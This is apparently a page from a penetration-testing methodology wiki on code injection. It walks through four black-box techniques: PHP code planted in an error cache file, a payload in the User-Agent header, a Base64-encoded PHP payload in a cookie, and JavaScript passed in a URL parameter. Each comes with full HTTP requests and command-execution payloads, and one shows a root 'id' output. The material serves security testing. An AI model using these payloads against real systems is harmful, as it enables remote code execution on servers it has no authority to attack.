search

Code Injection

hashtag
Check List

hashtag
Methodology

hashtag
Black Box

hashtag
Code Injection via Create Cache File

1

Interact with the target web application and observe that it generates client-side cache files to store application error messages

2

Identify a request sent from the client that includes user-controlled input within an array-based parameter (The important thing is that you have carefully considered who is also named config)

POST /index.php?owa_do=base.optionsGeneral HTTP/1.1  
Host: analytics.[REDACTED].com  
User-Agent: Mozilla/5.0 (Fedora; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0  
Connection: keep-alive  
Content-Length: 95  
Content-Type: application/x-www-form-urlencoded  
Cookie: owa_p=8aacef0fbef40d5f8d8121ec2cc19aff386329fb030ead140fdf26491bcc5; owa_u=admin;; owa-u=admin; owa_p=8aacef0fbef40d5f8d8121ec2cc19aff386329fb030ead140fdf26491bcc5  
Accept-Encoding: gzip, deflate, br  

owa_action=base.optionsUpdate&owa_nonce=45faa7aae1&owa_config[darkshhadow]=<?php system('id'); ?> <--
3

Send the modified request to the server and observe that the application fails to properly handle the malicious input and generates an error

4

Confirm that the generated error is stored inside a cache file created by the application

5

Access the generated cache file directly through the browser

6

Observe that the injected PHP payload is executed and the command output is written inside the cache file

hashtag
Code Injection in User-Agent

1

Log into the target site and intercept requests using Burp Suite

2

Note that the target application uses PHP

3

Then make a simple request to the page, intercept the request, and send it to the Repeater

4

Send a normal request to make sure there are no errors, then inject the following value in the user-agent header

GET / HTTP/1.1  
Host: example
Upgrade-Insecure-Requests: 1  
User-Agenttt: zerodiumsystem('id');]  <--- Code Injection
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Connection: close
5

Send the request. In the server response, if the code was executed, the Code Injection vulnerability is confirmed

hashtag
Code Injection in Cookie Parameter

1

Log into the target site and intercept requests using Burp Suite

2

Intercept a simple request and check if the Cookie parameter is Base64 encoded

GET /dashboard HTTP/1.1
Host: exmaple.com
Cookie: session=VXNlcj10ZXN0dXNlcg==
3

Delete the cookie value and then Base64 encode a malicious code based on the language written and insert it into the cookie, Payload before encoding

<?php system('id'); ?>

Payload after Base64 Encode\

PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==
4

Injected request

GET /dashboard HTTP/1.1
Host: example.com
Cookie: session=PD9waHAgc3lzdGVtKCd pZCcpOyA/Pg==
5

Then send the request and check if the code is executed in the server response, the vulnerability is confirmed

hashtag
Code Injection In url Parameters

1

Log in to the target site, operate the program as a normal user, and intercept requests using the Burp Suite program

2

Log in to the target site, act as a normal user, examine the features, and intercept requests using the Burp Suite program

3

On the target site, look for features and requests that request an external service or an external URL, such as the targetUrls parameter

4

Then, in the request sent to Url, give this parameter a URL that contains a javascript code or, depending on the language in which the program works, a JavaScript code, like

https://example.com/cms/gather/getArticle?targetUrl=http://jsonplaceholder.typicode.com/posts/1&parseData=return+process.version+||+"Code+Injection+successful"
5

in the Response

{
  "code": 200,
  "msg": "success",
  "source": {
    "userId": 1,
    "id": 1,
    "title": "sunt aut facere repellat provident occaecati excepturi optio reprehenderit",
    "body": "quia et suscipit\nsuscipit recusandae consequuntur expedita et cum\nreprehenderit molestiae ut ut quas totam\nnostrum rerum est autem sunt rem eveniet architecto"
  },
  "data": "uid=0(root) gid=0(root) groups=0(root)\n"
}

hashtag
White Box

hashtag
Cheat Sheet

PreviousIMAP SMTP InjectionNextCommand Injection

Last updated